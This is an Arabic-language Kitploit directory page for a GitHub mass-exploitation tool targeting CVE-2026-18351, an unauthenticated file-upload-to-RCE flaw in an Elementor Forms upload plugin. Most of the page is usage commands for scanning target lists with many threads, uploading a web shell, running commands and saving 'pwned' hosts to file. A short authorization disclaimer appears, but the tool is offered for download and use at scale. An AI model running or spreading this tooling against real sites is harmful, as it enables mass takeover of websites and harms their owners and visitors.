Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-18351 — أداة استغلال جماعي لـ CVE-2026-18351، وهي ثغرة رفع ملفات عشوائية بدون مصادقة تؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE) في Elementor Forms <= 1.6.0، مع الفحص السلبي، ورفع shell، وتنفيذ الأوامر. | Kitploit
أدوات/GitHubGitHub/johenlastgen-jlg/cve-2026-18351
ماسحات الثغرات الأمنيةالاستغلالالبرمجة النصية والأتمتةاستغلال تطبيقات الويبأمن الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHub
johenlastgen-jlg/cve-2026-18351

CVE-2026-18351

أداة استغلال جماعي لـ CVE-2026-18351، وهي ثغرة رفع ملفات عشوائية بدون مصادقة تؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE) في Elementor Forms <= 1.6.0، مع الفحص السلبي، ورفع shell، وتنفيذ الأوامر.

عرض المستودع
منذ 16س 29دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-18351

أداة استغلال جماعي لـ CVE-2026-18351 — رفع ملفات عشوائي بدون مصادقة ← تنفيذ أوامر عن بُعد (RCE) في Drag and Drop File Upload for Elementor Forms <= 1.6.0.

credit johenlastgen | telegram @johenlastgen | channel @jlgnetworkredirect


الميزات

  • فحص سلبي للثغرة (بدون رفع ملفات)
  • وضع الاستغلال الكامل مع رفع shell وتأكيد RCE
  • دعم هدف واحد وعدة أهداف دفعة واحدة
  • دعم تعدد الخيوط (Multi-thread)
  • تنفيذ أوامر قابل للتخصيص
  • ملفات إخراج كاملة، وللثغرات فقط، وللأهداف المخترقة فقط
  • إعداد مهلة الطلب

المتطلبات

لا توجد تبعيات خارجية — يستخدم مكتبة Python القياسية فقط.

root@kitploit:~
python3 --version  # 3.6+

الاستخدام

root@kitploit:~
# Single target — passive check only (no upload)
python3 mass.py --url http://target.com --check

# Single target — exploit with default command (id)
python3 mass.py --url http://target.com --cmd id

# Single target — exploit with custom command
python3 mass.py --url http://target.com --cmd whoami

# Mass targets — passive check
python3 mass.py --list targets.txt --threads 50 --check

# Mass targets — exploit
python3 mass.py --list targets.txt --threads 50 --cmd id

# Mass targets — exploit with timeout tuning
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami

# Save full log
python3 mass.py --list targets.txt --output results.txt

# Save only vulnerable targets
python3 mass.py --list targets.txt --output-vuln vuln.txt

# Save only confirmed RCE targets
python3 mass.py --list targets.txt --output-pwned pwned.txt

# Combined output
python3 mass.py \
  --list targets.txt \
  --threads 50 \
  --cmd id \
  --output results.txt \
  --output-vuln vuln.txt \
  --output-pwned pwned.txt

الخيارات

الخيارالوصف
--urlرابط هدف واحد
--list FILEملف يحتوي على روابط الأهداف (رابط واحد في كل سطر)
--checkفحص سلبي فقط — بدون رفع ملفات
--cmd CMDالأمر المراد تنفيذه على الـ shell (الافتراضي: id)
--threads Nعدد الخيوط المتزامنة (الافتراضي: 20)
--timeout Nمهلة كل طلب بالثواني (الافتراضي: 10)
--output FILEحفظ السجل الكامل في ملف
--output-vuln FILEحفظ روابط الأهداف المصابة فقط في ملف
--output-pwned FILEحفظ الأهداف المؤكد اختراقها (RCE) فقط في ملف

حالات الإخراج

الحالةالمعنى
PWNEDتم رفع الـ shell وتأكيد RCE
VULN-NO-EXECتم قبول الرفع لكن فشل تنفيذ الـ shell
PATCHEDتم رفض الرفع أو لم يتم العثور على nonce
ERRORفشل في الشبكة أو التحليل

صيغة targets.txt

رابط واحد في كل سطر. يتم تجاهل الأسطر التي تبدأ بـ #.

root@kitploit:~
http://target1.com
https://target2.com
# this line is ignored
http://target3.com

إخلاء المسؤولية

يُقدَّم هذا المشروع فقط لتقييمات الأمان المصرَّح بها، وأبحاث الأمان الدفاعي، والتحقق من الثغرات.

باستخدامك هذا البرنامج، فإنك تؤكد أن لديك تصريحًا صريحًا لتقييم الأنظمة المستهدفة. الوصول غير المصرَّح به إلى أنظمة الحاسوب محظور وقد ينتهك القوانين المعمول بها.

لا يشجع المؤلف والمساهمون الاستخدام غير المصرَّح به لهذا المشروع ولا يوافقون عليه، ولا يتحملون أي مسؤولية أو التزام عن أي إساءة استخدام أو ضرر أو عواقب قانونية ناتجة عن استخدامه.


المؤلف

JohenLastGen — JLG NETWORK

تنزيل الأداة